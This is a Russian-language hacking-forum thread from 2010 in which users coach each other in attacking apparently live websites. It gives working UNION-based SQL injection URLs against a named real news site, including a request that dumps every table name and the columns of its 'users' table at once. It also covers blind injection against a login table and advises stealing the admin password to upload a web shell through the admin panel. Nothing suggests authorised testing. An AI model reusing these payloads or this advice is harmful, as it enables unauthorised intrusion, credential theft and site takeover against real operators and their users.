13.03.2010, 16:28
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
нет прав или не туда льешь.
Что можно сделать в таком случае?
|
|
|
13.03.2010, 16:29
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
Сообщение от CyberHunter
Что можно сделать в таком случае?
вытаскивать пас админа зайти под его учеткой и пробовать лить шел через админку...
|
|
|
|
13.03.2010, 16:39
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Подскажите как сделать чтобы отобразились названия сразу всех таблиц?
Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+
Но как-то не найс через лимит по одной смотреть.
|
|
|
|
13.03.2010, 16:42
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
Сообщение от CyberHunter
Подскажите как сделать чтобы отобразились названия сразу всех таблиц?
Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+
Но как-то не найс через лимит по одной смотреть.
скриптом каким нить сдампи структуру.
|
|
|
|
13.03.2010, 18:09
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от CyberHunter
Подскажите как сделать чтобы отобразились названия сразу всех таблиц?
Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+
Но как-то не найс через лимит по одной смотреть.
так можеш выводит имена всех таблиц за раз
http://www.f1-world.ru/news/news.php3?idnews=-1003090020.0%20UNION%20ALL%20SELECT%201,(select%20 concat(0x3078,Hex(cast(group_concat(table_name)%20 as%20char)))%20FROM%20information_schema.tables%20 Where%20table_schema=0x6631776F726C64),3,4,5,6,7,8 ,9,10,11,12--
а так для вывода всех колонок с таблицы users за 1 запрос
http://www.f1-world.ru/news/news.php3?idnews=-1003090020.0%20UNION%20ALL%20SELECT%201,(select%20 concat(0x3078,Hex(cast(group_concat(column_name)%2 0as%20char)))%20FROM%20information_schema.columns% 20Where%20table_schema=0x6631776F726C64%20AND%20ta ble_name=0x7573657273),3,4,5,6,7,8,9,10,11,12--
Последний раз редактировалось YuNi|[c; 13.03.2010 в 18:13..
|
|
|
|
13.03.2010, 18:19
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
С нами:
9288289
Репутация:
40
|
|
Есть слепая инъекция
SQL запрос:
Код:
SELECT o.id_object FROM attributes a LEFT JOIN pro_ado_objects o ON a.id=o.id_attr WHERE a.control_type IN ('text', 'textarea') AND o.value LIKE '%%' +and+ascii(substring((SELECT login from user),1,1))>1#A%' GROUP BY o.id_object
Выдает ошибку Subquery returns more than 1 row
Есть какие то ещё варианты получить данные из таблицы?
Вывод ошибок отключен! |
|
|
|
13.03.2010, 18:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Сообщение от FAQ666
Вывод ошибок отключен!
Сообщение от FAQ666
Выдает ошибку Subquery returns more than 1 row
мда)
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
13.03.2010, 18:36
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
С нами:
9288289
Репутация:
40
|
|
А что мда? Ошибка такая. Но вывод ошибок отключен.
|
|
|
|
13.03.2010, 18:55
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от FAQ666
Есть слепая инъекция
SQL запрос:
Код:
SELECT o.id_object FROM attributes a LEFT JOIN pro_ado_objects o ON a.id=o.id_attr WHERE a.control_type IN ('text', 'textarea') AND o.value LIKE '%%' +and+ascii(substring((SELECT login from user),1,1))>1#A%' GROUP BY o.id_object
Выдает ошибку Subquery returns more than 1 row
Есть какие то ещё варианты получить данные из таблицы?
Вывод ошибок отключен! если ссылку не в студию что тут гадать бум чтол что там
|
|
|
|
13.03.2010, 16:47
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
скриптом каким нить сдампи структуру.
Как это сделать?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
